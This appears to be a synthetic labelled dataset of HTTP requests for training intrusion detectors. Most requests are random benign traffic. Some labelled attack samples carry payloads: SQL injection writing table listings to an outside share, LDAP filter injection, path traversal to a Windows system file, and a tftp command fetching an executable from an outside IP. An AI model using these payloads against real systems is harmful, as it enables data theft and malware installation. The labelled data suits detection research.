Via: HTTP/6.1 211.229.132.134, FTP/9.1 65.12.193.102, 8.1 105.18.212.221:3
Transfer-Encoding: deflate
Upgrade: u38eo6/6.6
Warning: 931 121.162.158.127 "waietaBsyrhnsoeuiegt" 
X-Forwarded-For: 207.142.89.78
X-Serial-Number: 8712140
----: -------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 22865
Start - Id: 33620
class: Valid
PUT /rAYCnk/wcSXHhGY1r@/roruEaEangule.shtml? HTTP/1.1
Content-Length: 221
Content-Language: u,8,l2d8
Content-Encoding: deflate
Content-Location: http://AndLh.be/rhnla/oupa.gz
Content-MD5: bnRiZWphZnNMZGFsMGhhNg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 21 Oct 06 14:55:10 UTC
Last-Modified: Fri, 15 Jan 10 09:32:36 CET
Host: 98.116.184.154
Connection: bewfays
Accept: image/*, text/html
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.2
Accept-Language: anwed1-inws;q=0.3
Cache-Control: oe4u='3e'
Client-ip: 47.0.91.92
Cookie: cGjycte=1lcOOOem-wC;pmPUhttp=mCnph-8r;er=adm;CEaamEFris=shutdownSngOt
Cookie2: $Version="4"
Date: Mon, 21 Feb 05 16:34:55 GMT
ETag: "TDhCVf3EMA5wU71Rg8Y"
Expect: 100-continue
From: 6iheve@Oit7r.de
If-Modified-Since: Tue, 14 Oct 08 14:27:40 GMT
If-Unmodified-Since: Sun, 22 Jan 06 06:37:59 CET
If-Match: *
If-None-Match: "Hck@0e8CjaNb.w5A5@"
If-Range: Tue, 14 Sep 04 17:02:31 UTC
Max-Forwards: 340
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: he4i eatsbAd=sz20
Authorization: Basic dmZpbzpoZXRpcg==
Range: 409459-7,-297771
Referer: /oheev/iqszco.swf
TE: deflate;q=0.3,trailers,trailers
User-Agent: Mozilla/9.2 (X11; U; Unix 2.4; 4s-sh; rv:7.1.8) Gecko/03064357
UA-OS: Win98
UA-Color: color8
UA-Pixels: 468x6101
Via: 5.2 www.Wnponp.html, uevdgD/7.2 www.0i2xss.shtml:9726, 6.3 www.aonig.jpeg
Transfer-Encoding: gzip
Upgrade: ucx/1.7, tRl/3.2
Warning: 423 7.145.181.0 "nies8lf" "Sun, 13 Mar 05 06:24:37 CET"
X-Forwarded-For: 246.11.40.158
X-Serial-Number: 240360434535406281
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

td4p=abshutdownHuoU 0cUsozmiiqwo&og4mEicsyocI=6pjln&tanneawPseltt= kaperl eni&lN=h1a8tojopNltl&ielvlek=t2@Z&jroswmomhmbShw=eReeeel25bgsounde0dfas&exGoNishbEdjkt=n4nnsa Ehpassthruspl&rnt5=0ebx@&stepmrbQ0refs=7&ary=3669

End - Id: 33620
Start - Id: 36395
class: OsCommanding
GET /cc4eA5/sco/aM3n5rIF74./Pltmhalfaaw9hbag/et9nz4Y/3T.8IDNr3_Y.js?8a=eetawhanlztnit HTTP/1.1
Host: 100.155.34.89
Connection: close
Accept: application/rtf;q=0.4
Accept-Charset: *;q=0.8
Accept-Encoding: compress, identity;q=0.5, deflate, compress, deflate
Accept-Language: *
Cache-Control: max-age=30
Cookie: aolwxrm=813869;e5fsieyhg=';     EXEC master..sp_makewebtask    "\\165.243.25.161\r8dtrar\rBas5r.tiff",  "SELECT *   FROM  INFORMATION_SCHEMA.TABLES";rr=pNTCrp7zZUv
Cookie2: $Version="3"
Date: Wed, 22 Sep 04 21:11:25 UTC
If-Match: "BZ8oWSrTPRWlTWv5ruOR"
Proxy-Authorization: Basic T2VkZzpiM3Rt
Referer: /yni9/iteleteu.wmn
TE: gzip
User-Agent: iYEIOj http://www.borI.net
UA-OS: Mac OS X
Transfer-Encoding: compress
----: -------------------

null

End - Id: 36395
Start - Id: 4775
class: Valid
POST /cOBgJZZvv3/OQtyJ/oI4to/yqiisMac0tijflt/Lvy33iE0d/hS65j6/el/10ehuis3uaieuwp6Hm/sjNAkVZb/DLeckscemfumenunH/syhehbOnm9iTtTIer/oemawEhsw0ioidunmet.pl? HTTP/1.1
Content-Length: 30
Content-Language: ibssn,stii
Content-Encoding: compress
Content-Location: http://srcP8re7.uk/asooeolj.tar.gz
Content-MD5: aHJjZXRhTWxvbXh0aGk5Yw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 12 Apr 08 18:17:45 CET
Last-Modified: Wed, 09 Jun 04 03:11:57 UTC
Host: www.eereoirm.ch:1735
Connection: adodero
Accept: application/zip;q=0.7, video/*;q=0.5, audio/x-wav;q=0.9
Accept-Charset: iso-8859-2;q=0.4
Accept-Encoding: 
Accept-Language: ebldwn6c-yo;q=0.3, e-Nl, e-tzizV
Cache-Control: no-transform
Client-ip: 187.93.237.97
Cookie: tasaqsln=sn3gss89u;d@Rvz2=596869;scriptdzo6T=ietRsecho;dro=lrko
Cookie2: $Version="1"
Date: Mon, 04 Sep 06 04:02:41 GMT
ETag: "qBJcdA11IyNlUnRQUtm"
Expect: mijtq5m
From: eusrek@6EeaAEdeOD.it
If-Modified-Since: Sat, 01 Jul 06 04:55:22 CET
If-Unmodified-Since: Mon, 09 Jul 07 04:08:05 UTC
If-Match: "nnI7WeH-l5z5NobTz"
If-None-Match: "s.CkVj1V@k8Gs8wO7IP0"
If-Range: "YlqFmYIjNLZK9dYU672."
Max-Forwards: 1
MIME-Version: 0.4
Pragma: nesstue='vOA'
Proxy-Authorization: Digest uri=http://www.efttzis.be/nlrez/ltpeh/rkieoIj.gif
Authorization: hpLcsa rrpn3nbs=naldo
Range: -223574,77-
Referer: /lr2li/hstu/enayn/soef.asp
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: dFuhSLCwTe http://www.flhEsb.cz
UA-CPU: PowerPC
UA-Disp: 717,3860,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 425x376
Via: rmnarl/7.6 www.ejrgsy.shtml
Transfer-Encoding: deflate
Upgrade: zedlh/8.1, naR/6.0, eeufs/3.6, reei/8.9, fshaut/4.2
Warning: 541 246.190.52.10 "Lgejbyurversetq" "Sat, 20 Jun 09 14:22:24 UTC"
X-Forwarded-For: 247.63.27.49
X-Serial-Number: 095672914255730
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

VCk@sKsock_streambgsound=05022

End - Id: 4775
Start - Id: 38129
class: LdapInjection
GET /tto0hsti/atao/il7l.gh2XOWJLSpjR/h0n/o308hmuegzy1nnss/qlibmsconnecte1Du9aX2z/tA/4H_nbgsb-JJ9q4Ajbb.jsp?gtqytttH5=15837740&DAt0lneei=%29T%3Cb%40%5Drme&ne=733814&Olrsihntnsy=ynkikaucwemNng&euoa7ih=ji%29%28++%7C+%28mcem5%3D*%29&img5Lpassthrui5havingE=j%26ao8&ah08sa=ilog%5CE&eee5bwhyinemqi=Oxrhtpassmail HTTP/1.1
Host: www.sEsuge6i.uk
Connection: close
Accept: */*
Accept-Charset: windows-1251;q=0.1, x-mac-turkish
Accept-Encoding: 
Accept-Language: nhmcr-t7ui, e4to-t
Cache-Control: no-cache
Client-ip: 117.134.138.91
Cookie: Dersvlenn=systemtsNientrl;neaoHd=httpaaaobjectre;Retoelwae=\kys]pcEs6 ;kut=4;seetne=9;thaeuyaq9eomfua=tcrseYuud8
Cookie2: $Version="5"
Date: Mon, 02 Oct 06 01:15:12 UTC
ETag: W/"XSJy2BP.3@6hcqV.O8h6"
Expect: 100-continue
From: ttste@rra4euq0.de
If-Modified-Since: Mon, 18 May 09 02:36:53 GMT
If-Unmodified-Since: Sat, 02 Feb 08 18:09:18 UTC
If-Match: "O@KraQ34@7QxRmFDaSi"
If-None-Match: "Iu9KZp@Y5XLQxj876r8"
If-Range: Fri, 12 Oct 07 06:57:02 UTC
Max-Forwards: 8834
MIME-Version: 2.1
Pragma: ub8rreh=swt8a
Proxy-Authorization: ttA2f lstyphu=yxiY
Authorization: Digest realm
Range: 17768-5
Referer: /tsninrRm/atmb/nputs.js
TE: chunked,chunked;q=0.3
Trailer: From
User-Agent: Mozilla/6.6 (compatible; 5hifr; Linux i386; el2n; yeacixo8ez; n0dld4o)
UA-CPU: 68000
UA-Disp: 072,9161,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 9991x6291
Via: 2.6 www.9ztq3.jpg, FTP/2.2 www.strf6e7.jpeg
Transfer-Encoding: 4zsf
Upgrade: gsce/8.8, osc/5.9, loe/5.9, ect/1.6, 1xRehs/4.9
Warning: 380 www.gtcrerT.html:4591 "ksmndhegEt2od" "Sat, 04 Oct 08 01:21:24 GMT"
X-Forwarded-For: 106.193.146.221
X-Serial-Number: 276586158043
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38129
Start - Id: 1732
class: Valid
GET /0CVhg1X/t0hhDL/buNSz@AR98/aRTlfni.jsp?xetnspod=hobw&0xtermQy2dropNggRXs=sehttpi&cesoiau=hoo&htdennnnk=A%28Er+sX+l%26O+&isoeateuhcS3=+etne&UHIn=6201&F3between_aYsWyTo=suot+j&BFNoptpp48QLZm=dkGd8bv85W&1oRxo2dhnid=im9zqprh%272elrtn&ni=3553904&rsttan7hgad2orm=0351&a8apasmlaoee=5756518&tAahy0XaaaA=987659&gsc=9 HTTP/1.1
Host: www.5itm.gov
Connection: fited
Accept: image/*, image/jpeg;q=0.7, application/*;q=0.6
Accept-Charset: iso-8859-15, x-mac-roman;q=0.1, cp-950;q=0.2, shift_jis;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 109.240.50.123
Cookie: ag=6vans;fWesSee=ttkzdropaNtfs=du;ihadtincli=0080333;rNsraeio9ntd=1;TiOTei6uon8tadi=bHzg4Yq2
Cookie2: $Version="377"
Date: Sat, 30 Jul 05 17:43:03 CET
ETag: W/"L7f1sN7yyH1pr8.R"
Expect: 100-continue
From: ylmul@hfldTeee2.org
If-Modified-Since: Mon, 20 Mar 06 17:37:12 GMT
If-Unmodified-Since: Fri, 06 Jun 08 01:36:19 UTC
If-Match: *
If-None-Match: *
If-Range: "P32QSSEKjo1772O"
Max-Forwards: 6046
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: eahnhs rr6D=telemrl
Authorization: ieeh nrlsvus=tolc
Range: -37,450406-
Referer: /6iag/agode/aRtmr/sdbXAoWi/ek1tgi.php4
TE: deflate;q=0.1,deflate
Trailer: If-Match
User-Agent: Mozilla/0.4 (Machintosh; U; Mac OS X 5.6; ch-aw; rv:9.5.2) Gecko/92720033
UA-CPU: PowerPC
UA-Disp: 2261,729,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6206x0801
Via: hnh/3.6 www.tasd.jpg, 3.6 www.lzreCyl.js
Transfer-Encoding: identity
Upgrade: ejodco/1.2, nnhlf/2.2, sht/7.3, 6nmn/0.5, neetes/1.7
Warning: 145 www.Iehgiho.html "wrbmde7w6d7Oeekrmc" 
X-Forwarded-For: 102.24.89.42
X-Serial-Number: 455016477
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1732
Start - Id: 2996
class: Valid
GET /nconwupniatrsahboet/zI39ib_zBDtGgU5Ty/rctt/hlm_H.mUDFuAlz3.php3?GnT9tutcaeeo5er=loet0atuAadosetl&3ye7iTes5Atyc=AtT&qvJiKpGcH=7&GgsyaWVH0-7=ourl&aeHceards=642&k83srlcvbsd=y%40%3Dandnodeo HTTP/1.0
Host: 83.73.83.18
Connection: keep-alive
Accept: application/x-tar;q=0.7, image/gif;q=0.7, text/*;q=0.1
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: nDlid0cu-3whwt;q=0.7, 7ehnie-yn, l7rnt-pvraqI5;q=0.1
Cache-Control: min-fresh=7866
Client-ip: 235.26.250.245
Cookie: ecO=88242;Ur3whyrsnn1i=Wv66c8lowronati
Cookie2: $Version="689"
Date: Sun, 09 Nov 08 07:28:17 UTC
ETag: W/"oqgI8hu-id-K1uVS4C"
Expect: tMoo
From: sMew@IhehlCaold.be
If-Modified-Since: Wed, 22 Dec 04 03:23:38 CET
If-Unmodified-Since: Mon, 02 Oct 06 15:38:28 CET
If-Match: "@3M@VgnaW_cMqjaT_vj."
If-None-Match: *
If-Range: *
Max-Forwards: 188
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: NTLM dWVPc1hsN3p3c2VUc3FXaG9FdGlnd2RuZTRlVWRsdGF0Zm90b2E=
Authorization: Digest nc=eB3E76Db
Range: 9314-,96-
Referer: http://www.akAru6i.uk/aasuibus/fsnp.mdb
TE: deflate;q=0.3,trailers
Trailer: TE
User-Agent: tehhtE (vCL7pgowyY)
UA-CPU: StrongARM
UA-Disp: 767,9233,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4979x0191
Via: 8.5 www.bMtp.jpeg, FTP/8.9 184.203.216.214
Transfer-Encoding: oahe
Upgrade: psuwtu/8.0, Nemih/3.2, owog/3.0, rc2iey/0.5
Warning: 133 129.24.35.131 "eutrftdlptmud" 
X-Forwarded-For: 191.50.240.235
X-Serial-Number: 39984855
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 2996
Start - Id: 22127
class: Valid
GET /haFwwQGGYyH9s/9b/aiemAascoSdn/xaNfvbscriptrG7mailps4/vM/onnsto93ryih/29/gdsfeaetRt/idoplsteul7elhrl/wfy6Gs1ctY1vAj.cfm?hemtt7fNe=wlenrede%40sest&te3ie9geblx=eqhlt&tOaguDo7=stpnecNtcg+hra%28&nnnIt2=0118662&dnrlEeepan=21200&e7kurWOhlite3z=wtaotdb&ER_jdelete=ostnode+passthru%5Btseo%5B94e+U&hpi3amnod=ated7iwOLrrhltscim&OK8IUbQ=0dedeo HTTP/1.1
Host: 53.54.99.55
Connection: toen
Accept: audio/basic
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: lfe3-dsa;q=0.7
Cache-Control: no-store
Client-ip: 204.187.68.18
Cookie: d9itunCcosS=3hwk;Gmrwindow.openkIWQCL.t=teie HaiWba[;s;rnrglir=5055086;3vThiE2cicr=aohkd0errtf9hdec
Cookie2: $Version="10"
Date: Thu, 01 Oct 09 12:03:35 CET
ETag: "Eo5FYzDFb7Xyw5IhtlZO"
Expect: 100-continue
From: ers7@stiihe.com
If-Modified-Since: Mon, 12 Sep 05 21:34:47 GMT
If-Unmodified-Since: Thu, 14 Dec 06 08:44:16 CET
If-Match: *
If-None-Match: "YYHnrLuic6Ng0Vh"
If-Range: "PcFVYs_cVMa5fDPK"
Max-Forwards: 203
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Basic ZGduczh0Tm86czhlZg==
Authorization: Digest realm
Range: 1976-
Referer: /rlEi6onU/CsnTmei.zip
TE: trailers,deflate;q=0.5,trailers
Trailer: Transfer-Encoding
User-Agent: ntncLong
UA-CPU: x86
UA-Disp: 2956,8446,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 221x4182
Via: FTP/0.7 www.auihL.jpg
Transfer-Encoding: gzip
Upgrade: ereinf/3.5, eEt0/2.9, zrTT/7.8, hta/4.0
Warning: 827 195.166.47.193:1 "Ioantgeer1tmsd5ne" 
X-Forwarded-For: 150.191.145.37
X-Serial-Number: 758582186109644
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22127
Start - Id: 35978
class: PathTransversal
GET /5n/iBX.DxpcMdX5Y/2VEnhIh@UOC2qAsT5HFB/iiEp/pmf9e@/eYkyb42/naasnT4nocraoixwm/tVrOD-2.AgoIm1rF0K/u8buUxbPVXaOy9/5T6YuOIIsorXTJGTD9St/Dizt7si4riioHte1Aer.gif? HTTP/1.0
Host: 23.66.64.182
Connection: keep-alive
Accept: audio/*, text/*
Accept-Charset: windows-1258, x-mac-chinesesimp, iso-8859-8;q=0.0, x-mac-chinesetrad;q=0.4
Accept-Encoding: *;q=0.5
Accept-Language: tiBi12os-eaa;q=0.8, v-Eicari, sItoe-iae;q=0.3
Cache-Control: min-fresh=27863
Cookie: eseoshinathlnbr=../../../../../../../../../WINDOWS/autoexec.bat
Cookie2: $Version="449"
Date: Fri, 03 Feb 06 20:24:17 UTC
ETag: "tgLPcnhwfGUlb@I"
From: tLeD2dse@Sebocolh.gov
If-Modified-Since: Wed, 18 Feb 04 12:57:35 UTC
If-Unmodified-Since: Fri, 20 Apr 07 06:07:42 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 27
Pragma: no-cache
Authorization: NTLM bmhjYW93YWloU2VvZWFydHRvZW9KZERxZXNpU2kyTmVzejgyaWVQbGZudDFnOHFh
Referer: /cryos/4qof/Uhrer.jsp
TE: trailers,trailers,deflate;q=0.0
User-Agent: Mozilla/3.3 (Windows; U; Win 9x 7.9; ci-ln; rv:4.1.3) Gecko/17947236
UA-Color: color32
Via: FTP/2.7 25.58.213.37:636, FTP/9.9 74.216.13.108, 9.4 38.144.251.99
Transfer-Encoding: gzip
Upgrade: sih7e/2.8

null

End - Id: 35978
Start - Id: 13582
class: Valid
GET /ste2soEpi.gif?0Iaccess_loglCFF=Anhu&firhxtsde=sP4Drgk9P&l0hmpotweican=9339939971&nrm7ddInuebHNh=oh%24update%2Bec%5Batmp%26vse%26nh&toosoA=05565433&hielwcd=aforme&messi=nlb+%7C+tb&tckncR=69&tn=elion3itw+etcybn&2Nod=iusEae3ja&ea7n=xml4mya&r7taei=kGz7aOe HTTP/1.0
Host: 207.9.22.170:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.1
Accept-Encoding: compress;q=0.0, deflate;q=0.1, deflate, identity;q=0.5, gzip
Accept-Language: nkPsk-rlOfe;q=0.3, epltod-uUMoimpb, 7-Yegnn;q=0.3, Yfhte-towioIe, sono0L-4tdod7t8;q=0.2
Cache-Control: max-stale=6085
Client-ip: 134.203.218.183
Cookie: er4oaddtiLrr=ie7|;7tndqAZGfchaving1=rTcbfhqj3Trssece;erH7treftsn44s=2
Cookie2: $Version="5"
Date: Sun, 24 Jul 05 20:54:57 UTC
ETag: W/"e.SDNJ-iNbRXTFkp"
Expect: sp4siceo
From: 3y8ohDtm@Errta.cz
If-Modified-Since: Fri, 22 Jan 10 15:45:21 CET
If-Unmodified-Since: Wed, 12 Oct 05 02:59:44 UTC
If-Match: "NagQlEMmNb4lO9XOI89d"
If-None-Match: "Qh8taIcmGtE3CHgWHa"
If-Range: *
Max-Forwards: 5383
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Basic dGl1b3R2Om9hZWVvaVMy
Authorization: Basic ZElzdHI6c2VubQ==
Range: 625-
Referer: /tste/Crlehtpg/nwfir0/tr1rrhy.exe
TE: chunked,chunked
Trailer: If-None-Match
User-Agent: lrGn7aUesB
UA-CPU: Sparc
UA-Disp: 896,6607,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 138x4900
Via: HTTP/5.0 www.isoa2as.png, bqr0c/6.2 186.244.212.35:8
Transfer-Encoding: identity
Upgrade: tsoo4A/5.4, a7l/6.5
Warning: 703 178.118.249.8 "oetetNse5t" "Tue, 31 Jan 06 07:52:19 UTC"
X-Forwarded-For: 117.246.88.253
X-Serial-Number: 70032554284651
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 13582
Start - Id: 5501
class: Valid
PUT /Y7MW1/ogizeesignxiasn/rYN/eqytashJRtjBsmlcndeb/3shla/sCT7EWowzEN9k4Ef/uSobbAec6PiOoTS/dMmgeoetufall/rb8uEsfep3ebetse40/eA2nnngecms/ejx7LN8/c.jPDG.4-kDJW..jpeg? HTTP/1.0
Content-Length: 204
Content-Language: hhBirs
Content-Encoding: identity
Content-Location: http://lorzt6.uk/a7h0/oerk/mulf/noTo2e/pEiieal.cgi
Content-MD5: ZXRZNWlld2ZueWVic2VvZw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 20 Jan 09 09:03:04 CET
Last-Modified: Mon, 13 Aug 07 17:48:24 GMT
Host: 13.135.214.208
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: us-ascii;q=0.5, iso-2022-kr;q=0.4, x-mac-roman, x-mac-chinesesimp;q=0.3
Accept-Encoding: 
Accept-Language: 4Whpd-nqCa, o9roH2-gwTKms;q=0.9, naeiaai-ctcaS;q=0.8, hbN-t5inreC3;q=0.4
Cache-Control: max-age=10929
Client-ip: 158.89.14.102
Cookie: mfn=n/wgete0anctcis1 icTaz>e
Cookie2: $Version="42"
Date: Fri, 14 Aug 09 06:10:24 GMT
ETag: W/"ClRNYgOpJa7vxzd"
Expect: 100-continue
From: 5dsrcsa@9ag1.it
If-Modified-Since: Sun, 21 Mar 04 10:46:35 UTC
If-Unmodified-Since: Tue, 20 Mar 07 21:29:16 GMT
If-Match: "0Vh4yElnkcXgsuhz2k"
If-None-Match: "mfcl1KRh8JMB8NQr7xQ"
If-Range: Thu, 29 Jul 04 24:39:25 GMT
Max-Forwards: 01
MIME-Version: 6.9
Pragma: up5d5iw=anescfyh
Proxy-Authorization: Basic RXR3d2dpd3c6dzZnZXB4ag==
Authorization: Digest nc=EC53563c
Range: 4-,7992-3492,625-
Referer: http://whmuoS.net/khFwS.jpeg
TE: trailers,chunked
Trailer: Date
User-Agent: 8-FgFY1 http://www.nsedot2u.org
UA-CPU: 68000
UA-Disp: 401,4079,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 8888x9609
Via: rocere/8.7 www.whmb0.css, HTTP/4.9 www.eeaAop.htm
Transfer-Encoding: deflate
Upgrade: 7le/3.6, 8ss/3.8, jc8srs/9.3, rmha/3.0
Warning: 066 www.jd9ta1.png:53 "0Aepntacmtorttss" 
X-Forwarded-For: 16.29.207.187
X-Serial-Number: 5440526
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

yEu3zcs6atathg=eobeXC5JW7y&nesq0=w3Lrweo&0o2tuitably=14769&5doet4nicO=y&rohBwhneta=oegoYcgnofets1eejE&mmem=555&enmerRsHoronxr= mEs&MUpasswdD=liaE7naxltyupbOay&lmn= st]tlaewasaainsertE&nnZll=a4SPCZaO-NRt

End - Id: 5501
Start - Id: 28246
class: Valid
GET /uCpositioninclude5/esfZzl0Aq7/LnmuhlTbt5hg6fab0d7/Nnsrntia4tc5/RbYlC06tZQnRinPe/touFK_VzGpwV@H/npfiseennteimied2eft/yoMFkfE/d3onr9/dKXmVW.WlhRZV81zk/ssc1ec1igd.exe?ch9eercs=59010&iaiue9tniO=u3etzemu5syHra&.zqAVq=738&Ya08o6eaakks=6259807240&8ya2efds=eAoOv1sstro&icdUn5ekii=jer&e8lex=netcatid&nn5pfgi=diframe8&Eaieaeaa5l=404954644&at=96&p7d17=3502&fcen=46 HTTP/1.0
Host: 186.30.187.67
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-japanese;q=0.1, x-mac-japanese, koi8-r
Accept-Encoding: *
Accept-Language: AwdrmEeP-rnojso, rNtttnh-3lb;q=0.9, e-n0;q=0.5, b0sxa-m;q=0.1, leG-2n41er
Cache-Control: hEseve='i'
Client-ip: 141.31.102.223
Cookie: ohbdyesrruwr2=akdropmr
Cookie2: $Version="335"
Date: Tue, 08 Dec 09 01:42:56 UTC
ETag: W/"h5RyVwb5Q-2_w1WV@d6F"
Expect: ibTp1t=svzsd
From: e7ne1tE@sl9o.st
If-Modified-Since: Fri, 15 Jun 07 17:24:27 CET
If-Unmodified-Since: Wed, 25 Feb 09 03:58:27 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 13 Apr 05 04:08:53 CET
Max-Forwards: 09
MIME-Version: 8.6
Pragma: 2tcnsT='oxcn'
Proxy-Authorization: NTLM cmVuaXltZWVscGVyY29lb2xhaHRzYWVtc3N1bnJ3Ym9hcmFpSWRhY28xc3E=
Authorization: arsc2 p0nm=issr
Range: 29956-,-15205
Referer: http://AoaeF.st/Tlentd/punWtt2.fgf
TE: trailers,deflate,chunked;q=0.1
Trailer: Host
User-Agent: n0.92ZnxA http://www.6gnsnS.st
UA-CPU: MIPS
UA-Disp: 957,7809,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 096x863
Via: 5.2 www.oios.html:525, HTTP/6.8 172.228.236.169
Transfer-Encoding: identity
Upgrade: 0annoh/0.5, hzia/9.6
Warning: 303 www.wmahnr.css "dEhrH1lma7a" "Wed, 03 Mar 10 19:58:07 UTC"
X-Forwarded-For: 209.67.183.110
X-Serial-Number: 144317661774202
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28246
Start - Id: 19819
class: Valid
GET /jeHha0697mMzWjnCf./nqonaipr4xoistqtsnw/eaesyliogene/th.htm?aoT3ttaR=t%2B%5Br6R&ipcE=72&tsahfoWaAtoctqe=fesak&ablc=e7euhtr&NxtermAmz=rln HTTP/1.0
Host: 210.238.13.234:80
Connection: close
Accept: */*
Accept-Charset: x-mac-turkish;q=0.0, windows-1254, iso-8859-2;q=0.8, windows-1257, x-mac-greek
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: e4gr=Eloaa7
Client-ip: 61.65.38.26
Cookie: ble=ix76s4eUjYO
Cookie2: $Version="0"
Date: Thu, 05 Jul 07 17:00:31 GMT
ETag: "39.e9u@GR2LSlY7G2."
Expect: wenln=ensstluw;hgeb
From: 3ipnnnqa@edukeeehui.net
If-Modified-Since: Thu, 22 Nov 07 07:01:51 UTC
If-Unmodified-Since: Thu, 28 Feb 08 24:10:23 CET
If-Match: *
If-None-Match: "MGOE2b8LvGWYR7Xffzj"
If-Range: Thu, 19 Apr 07 07:30:34 GMT
Max-Forwards: 0
MIME-Version: 6.4
Pragma: h=zcg8Nd
Proxy-Authorization: Basic c3Q3dGx0OmFpaHBzc3k=
Authorization: NTLM RW5tdHBjdGdoNmVzZ2VuY2dBcmVkcEIxR3RoMGJxZXlsTw==
Range: -2
Referer: http://www.easlMSx.org/Zriiimu/rZ0feae4/T0oaeha/4GysfiA/iEfEa3e.jsp
TE: trailers
Trailer: Proxy-Authorization
User-Agent: puuaIetesowriiglmsoe
UA-CPU: PowerPC
UA-Disp: 0003,957,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 6942x692
Via: 7.6 www.eebafte.gif, 9.7 www.7bt8auUi.jpeg:8, 0.5 www.nreG0D.jpeg
Transfer-Encoding: compress
Upgrade: urt/1.5, duy66/3.8, 6ru/6.9, sii/9.2
Warning: 943 237.25.13.45 "Lnhareesflia5" 
X-Forwarded-For: 176.249.106.242
X-Serial-Number: 09282554265324
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19819
Start - Id: 10777
class: Valid
GET /deIicze/otis/OraMpTl6/oetsenttrrts3tlO/9R.cB@J/nqYLJbXEA7oloLCJC6k/mtM/mo7tumobwB3tioid2nr/4tx7lphar0drSibwma/acnRtnTuhohur43aeick.swf?uReBrRt6ajli=enf&dldyratmdnN=af6Zu%40&wna5dbmebfidEcr=pct&totr9e=nph-+mhe%25Tmt%2Biframe&edbne=8&wetpusugAecfmo=hKxLj1Gi71%40&saTvdyu9Heo4t=eo%5C&aeg5no=liNawke51e&rorh=araNod%3C89tt&eef=5phiwH&bucta3Hn=%2B+rnht6o%24g%7Eyun&s2ettetEwng3d=binl&dmI=srhtsxw&atoa0syp=n8fsn&sqd3gb2ka7ce=76856 HTTP/1.1
Host: www.httbeedu.cz:80
Connection: close
Accept: */*
Accept-Charset: windows-1258
Accept-Encoding: 
Accept-Language: rdneUo-nie2s;q=0.4
Cache-Control: tqsgetxw=lche
Client-ip: 228.70.131.109
Cookie: .EiFH5=exrszpoopleo<b
Cookie2: $Version="49"
Date: Mon, 02 Jun 08 24:43:52 CET
ETag: "BXgx4iZevSqj21K"
Expect: RsOsT1t
From: Ionmrq@m5vte.org
If-Modified-Since: Tue, 01 Aug 06 17:26:44 UTC
If-Unmodified-Since: Thu, 31 Mar 05 11:56:49 GMT
If-Match: "6cBfDMO.YDsSHrhrNlCe"
If-None-Match: "rj_mb755FF2PWxt"
If-Range: Wed, 26 Mar 08 05:47:33 GMT
Max-Forwards: 7793
MIME-Version: 2.2
Pragma: bftf=6taesnnt
Proxy-Authorization: Basic ZG5lMWU6c2VlcGNvbGM=
Authorization: tfh1c si1o4wGk=iunRy2l7
Range: 49686-192
Referer: /pbaoLsT/iaos6g/atekN.php
TE: trailers,deflate,chunked
Trailer: Host
User-Agent: Mozilla/3.5 (Windows; U; Win98 6.7; rr-rl; rv:1.0.9) Gecko/17574088
UA-CPU: StrongARM
UA-Disp: 4468,6865,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5959x647
Via: 0.8 255.118.157.182, ezttq/6.4 120.37.133.103
Transfer-Encoding: 3teu; tgzfeti=Ylrin
Upgrade: tup/2.0, iesn/6.5
Warning: 315 www.rsxtH2On.shtml:3975 "hleai" "Tue, 21 Sep 04 19:20:18 UTC"
X-Forwarded-For: 64.18.140.176
X-Serial-Number: 20081399202583865
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10777
Start - Id: 43374
class: OsCommanding
GET /sLSeM.jpg?2IOtrmbt=tftp++++-c+++get+++++155.139.21.64%3A%2Fsttion%2Fanmandch.exe++++%7C&2ctfOiagaET=146&riwpsdcsO=2592150822&scriptrF_-lmpRW=3&rbgsoundicT@len=uOJjwI&rdO=tqh&2dhL=szommhtiarts HTTP/1.1
